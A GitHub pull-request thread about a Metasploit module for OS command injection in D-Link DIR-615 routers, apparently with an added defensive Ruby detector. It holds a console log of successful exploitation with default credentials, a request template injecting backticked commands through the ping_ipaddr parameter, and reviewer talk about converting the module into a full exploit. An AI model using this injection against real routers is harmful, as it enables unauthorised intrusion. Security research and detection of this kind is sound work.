
Dlink dir615 os command exec #1640

Closed

Conversation


@m-1-k-3 m-1-k-3 commented Mar 23, 2013

Hey guys,

one more module - exploits the dlink dir 615 router:

```
Exploiting Demo - 192.168.178.105 / 0 auxiliary(dlink_dir_615_exec) > run

[*] 192.168.178.199:80 - Trying to login with admin / admin1
[+] 192.168.178.199:80 - Successful login admin/admin1
[*] 192.168.178.199:80 - Sending remote command: uname -a
[+] 192.168.178.199:80 - Exploited successfully
[*] 192.168.178.199:80 - Command: uname -a
[*] 192.168.178.199:80 - Output:
[*] Linux DIR-615 2.6.21 #2 Fri Jan 18 16:42:24 CST 2013 mips unknown

[*] Auxiliary module execution completed
Exploiting Demo - 192.168.178.105 / 0 auxiliary(dlink_dir_615_exec) > set VERBOSE false
VERBOSE => false
Exploiting Demo - 192.168.178.105 / 0 auxiliary(dlink_dir_615_exec) > run

[*] 192.168.178.199:80 - Trying to login with admin / admin1
[+] 192.168.178.199:80 - Successful login admin/admin1
[*] 192.168.178.199:80 - Sending remote command: uname -a
[+] 192.168.178.199:80 - Exploited successfully
[*] Auxiliary module execution completed
```

More details: http://www.s3cur1ty.de/m1adv2013-008

looking forward for your feedback

Best,
Mike

```ruby
#original request
#data_cmd = "page=tools_vct&hping=0&ping_ipaddr=`#{datastore['CMD']}; echo end`&ping6_ipaddr="

res = send_request_cgi(
```
Contributor


Looks like you're not sending credentials, nor cookies, nor tokens in the exploiting request; maybe it isn't authenticated after all? Just asking :)

Contributor Author


The D-Link is a crazy device ;) It authenticates my machine for 5 mins. Enough time to execute our commands.

Contributor


lol crazy! ok, in that case I think if you send the pcap for verification I can do the last cleanup by myself in this case and proceed with merging :)

BTW, if any of the payloads on metasploit allow you to convert any of the auxiliary remote code exec modules you're sending into an exploit module, it would be great :) Feel free to ask me for feedback if necessary :)

Thanks for your submissions!

Contributor Author


I will check all the auxiliary modules soon ... it's possible that we could generate some working exploits.
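The reviewed snippet above shows the injection vector (the `ping_ipaddr` parameter of the `tools_vct` page is passed to a shell, so backticks and semicolons in it run as commands), and the reply explains why the request carries no cookie or token: the router authorises the client's IP address for about five minutes after login. The following Ruby script is an added example, not code from this pull request or from Metasploit; it classifies constructed `tools_vct` POST bodies from the defender's side, accepting only strict IP literals and flagging shell metacharacters, and it deliberately does not treat a missing session cookie as a reason to ignore a hit. The sample bodies, the `SHELL_META` pattern and the function names are assumptions made for the example.

```ruby
require 'uri'
require 'ipaddr'

# Constructed sample POST bodies for the DIR-615 "tools_vct" page, URL-encoded
# the way an HTTP client would send them. None were captured from a real
# device; they only reuse the parameter names visible in the review comment.
SAMPLE_BODIES = [
  "page=tools_vct&hping=0&ping_ipaddr=192.168.178.1&ping6_ipaddr=",
  "page=tools_vct&hping=0&ping_ipaddr=%60uname+-a%3B+echo+end%60&ping6_ipaddr=",
  "page=tools_vct&hping=0&ping_ipaddr=8.8.8.8%3B+id&ping6_ipaddr=",
  "page=tools_vct&hping=0&ping_ipaddr=router.local&ping6_ipaddr=",
  "page=status&hping=0",
].freeze

# Shell metacharacters that have no business in a ping target (assumed list).
SHELL_META = /[`;|&$()<>\\\n\r]/

# Strict IP literal check: IPAddr must parse the value AND print it back
# unchanged, which rejects CIDR suffixes, hostnames and anything with spaces.
def strict_ip?(value)
  IPAddr.new(value).to_s == value
rescue IPAddr::InvalidAddressError, ArgumentError
  false
end

# Classify one request body. URI.decode_www_form is used rather than
# CGI.parse because CGI.parse also splits on ';', which would hide the
# injected part of the value. Returns the decoded target and a verdict.
def inspect_body(body)
  params = URI.decode_www_form(body).to_h
  return { verdict: :ignore } unless params['page'] == 'tools_vct'

  target = params.fetch('ping_ipaddr', '')
  verdict =
    if target.empty?                then :empty
    elsif strict_ip?(target)        then :ok
    elsif SHELL_META.match?(target) then :command_injection
    else                                 :malformed
    end
  { target: target, verdict: verdict }
end

# Tally verdicts over a list of bodies. Per the thread, the device authorises
# the client IP for about five minutes after login, so a request with no
# session cookie can still be authenticated: cookie presence is not a filter.
def tally(bodies)
  bodies.each_with_object(Hash.new(0)) { |b, h| h[inspect_body(b)[:verdict]] += 1 }
end

if __FILE__ == $PROGRAM_NAME
  SAMPLE_BODIES.each do |b|
    r = inspect_body(b)
    puts "#{r[:verdict].to_s.ljust(18)} #{r[:target].inspect}"
  end
end
```

On a real device the same `strict_ip?` test is what the CGI handler should apply before the value reaches `ping`; a validated literal can then be passed as a single argument instead of being interpolated into a shell command line.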

@m-1-k-3
Contributor Author

m-1-k-3 commented Mar 24, 2013

@jvazquez-r7 pcap is coming tomorrow. Thx for your helping hand

@jvazquez-r7
Contributor

Hi @m-1-k-3,

After asking more experienced developers, it would be better to close it for the moment and work on converting it into an exploit. As explained by @hmoore-r7, the libupnp exploit can be a good reference: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/upnp/libupnp_ssdp_overflow.rb

See #1637
